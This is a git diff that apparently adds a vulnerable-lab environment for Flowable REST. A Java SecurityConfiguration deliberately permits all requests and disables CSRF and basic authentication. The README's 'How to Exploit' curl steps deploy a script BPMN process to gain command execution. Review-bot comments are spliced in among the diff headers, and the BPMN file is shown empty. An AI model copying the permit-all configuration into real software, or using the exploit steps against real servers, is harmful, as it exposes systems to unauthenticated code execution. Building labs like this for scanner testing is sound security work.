diff --git a/flowable/exposed_ui/Dockerfile b/flowable/exposed_ui/Dockerfile
new file mode 100644
index 00000000..534dc142
--- /dev/null
+++ b/flowable/exposed_ui/Dockerfile
@@ -0,0 +1,19 @@
+FROM eclipse-temurin:21-jdk AS builder
+
+# Copy the Flowable REST app libs for compilation classpath
+COPY --from=flowable/flowable-rest /app/WEB-INF/lib /libs
+COPY --from=flowable/flowable-rest /app/WEB-INF/classes /classes
+
+# Copy our replacement SecurityConfiguration
+COPY SecurityConfiguration.java /src/SecurityConfiguration.java
+
+# Compile the replacement SecurityConfiguration against the app's classpath
+RUN javac -cp "/libs/*:/classes" \
+    -d /output \
+    /src/SecurityConfiguration.java
+
+FROM flowable/flowable-rest
+
+# Replace the original SecurityConfiguration with our permit-all version
+COPY --from=builder /output/org/flowable/rest/conf/SecurityConfiguration.class \
+    /app/WEB-INF/classes/org/flowable/rest/conf/SecurityConfiguration.class
diff --git a/flowable/exposed_ui/README.md b/flowable/exposed_ui/README.md
new file mode 100644
index 00000000..83330f99
--- /dev/null
+++ b/flowable/exposed_ui/README.md
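Review bot: Both `COPY --from=flowable/flowable-rest` lines and the second `FROM flowable/flowable-rest` reference the image without a tag or digest, so the libs the class is compiled against and the runtime the .class is dropped into can come from different pulls, and a Spring Security change in the base image would break either the `javac` step (the `authorizeHttpRequests` lambda API) or the class at runtime. Pinning the same tag or `@sha256:` digest on all three lines, e.g. `flowable/flowable-rest:<pinned-tag>`, keeps the build reproducible and makes the "secure" reference and the patched build comparable. A header comment such as `# Lab image: replaces SecurityConfiguration with a permit-all chain; never use as a base for a real deployment` would also stop the image being mistaken for a hardened build at a glance.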
@@ -0,0 +1,40 @@
+# Setup secure and vulnerable Flowable instances
+```bash
+docker compose up
+```
+
+## Test Secure Instance
+The secure instance requires basic authentication (default credentials: `rest-admin:test`):
+```bash
+# Without credentials — should return 401 Unauthorized
+curl -s -o /dev/null -w "%{http_code}" http://localhost:8080/flowable-rest/service/repository/deployments
+# Expected: 401
+
+# With credentials — should return 200 OK
+curl -v -u rest-admin:test http://localhost:8080/flowable-rest/service/repository/deployments
+# Expected: HTTP/1.1 200 with http response contains a json
+```
+
+## Test Vulnerable Instance
+The vulnerable instance has basic authentication disabled:
+```bash
+# Without credentials — should return 200 OK (no auth required)
+curl -v http://localhost:8081/flowable-rest/service/repository/deployments
+# Expected: HTTP/1.1 200
+```
+
+# How to Exploit the Exposed UI (on Vulnerable Instance)
+```bash
+curl -X POST \
+  'http://localhost:8081/flowable-rest/service/repository/deployments' \
+  -H 'Content-Type: multipart/form-data' \
+  -F 'file=@jsScript.bpmn'
+
+curl -X POST \
+  'http://localhost:8081/flowable-rest/service/runtime/process-instances' \
+  -H 'Content-Type: application/json' \
+  -d '{
+    "processDefinitionKey": "jsScriptProcess"
+  }'
+```
+Look for the `"variables":[{"name":"commandOutput","type":"string","value":"` at output of the last command.
diff --git a/flowable/exposed_ui/SecurityConfiguration.java b/flowable/exposed_ui/SecurityConfiguration.java
new file mode 100644
index 00000000..4ad672ac
--- /dev/null
+++ b/flowable/exposed_ui/SecurityConfiguration.java
@@ -0,0 +1,41 @@
+/*
+ * Copyright 2026 Google LLC
+ *
+ * Modified from the original version to remove authentication checks
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+package org.flowable.rest.conf;
+
+import org.springframework.context.annotation.Bean;
+import org.springframework.context.annotation.Configuration;
+import org.springframework.security.config.annotation.web.builders.HttpSecurity;
+import org.springframework.security.config.annotation.web.configuration.EnableWebSecurity;
+import org.springframework.security.web.SecurityFilterChain;
+
+@Configuration
+@EnableWebSecurity
+public class SecurityConfiguration {
+
+    @Bean
+    public SecurityFilterChain securityFilterChain(HttpSecurity http) throws Exception {
+        http
+            .authorizeHttpRequests(authorize -> authorize
+                .anyRequest().permitAll()
+            )
+            .csrf(csrf -> csrf.disable())
+            .httpBasic(basic -> basic.disable());
+        return http.build();
+    }
+}
diff --git a/flowable/exposed_ui/docker-compose.yml b/flowable/exposed_ui/docker-compose.yml
new file mode 100644
index 00000000..1f36f15f
--- /dev/null
+++ b/flowable/exposed_ui/docker-compose.yml
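Review bot: The class has no Javadoc, and the only statement of intent is the license header's "remove authentication checks", which undersells what `securityFilterChain` actually does: it permits every request and additionally disables CSRF protection and HTTP Basic. A class-level Javadoc such as `/** Lab-only drop-in replacement for Flowable's SecurityConfiguration: permits all requests and disables CSRF and HTTP Basic so the REST API is reachable unauthenticated. */` states all three effects where a reader will look first. Because the file shadows the upstream class of the same package and name wholesale, any other beans the original defined (a UserDetailsService or PasswordEncoder, for instance) are gone as well; that is inferred rather than visible here, so it is worth confirming the image still starts cleanly and noting in the Javadoc which upstream beans were intentionally dropped.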
@@ -0,0 +1,22 @@
+version: '3'
+
+services:
+  flowable-secure:
+    image: flowable/flowable-rest
+    container_name: flowable-rest-secure
+    ports:
+      - "8080:8080"
+    networks:
+      - flowable-network
+
+  flowable-vulnerable:
+    build: .
+    container_name: flowable-rest-vulnerable
+    ports:
+      - "8081:8080"
+    networks:
+      - flowable-network
+
+networks:
+  flowable-network:
+    driver: bridge
diff --git a/flowable/exposed_ui/jsScript.bpmn b/flowable/exposed_ui/jsScript.bpmn
new file mode 100644
index 00000000..0ec2779e
--- /dev/null
+++ b/flowable/exposed_ui/jsScript.bpmn
@@ -0,0 +1,30 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
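Review bot: Both `ports` entries bind on every host interface, so the `flowable-vulnerable` service, whose REST API answers unauthenticated requests by design, is reachable from any machine that can route to the Docker host rather than only from the README's `localhost` curls. Binding to loopback, `- "127.0.0.1:8081:8080"` (and `- "127.0.0.1:8080:8080"` for the secure service), keeps the lab usable exactly as documented while keeping it off the LAN. The `version: '3'` key is obsolete for current Compose and only produces a warning, so it can be dropped. `image: flowable/flowable-rest` is also unpinned, as in the Dockerfile, so the "secure" reference and the patched build may drift apart between pulls.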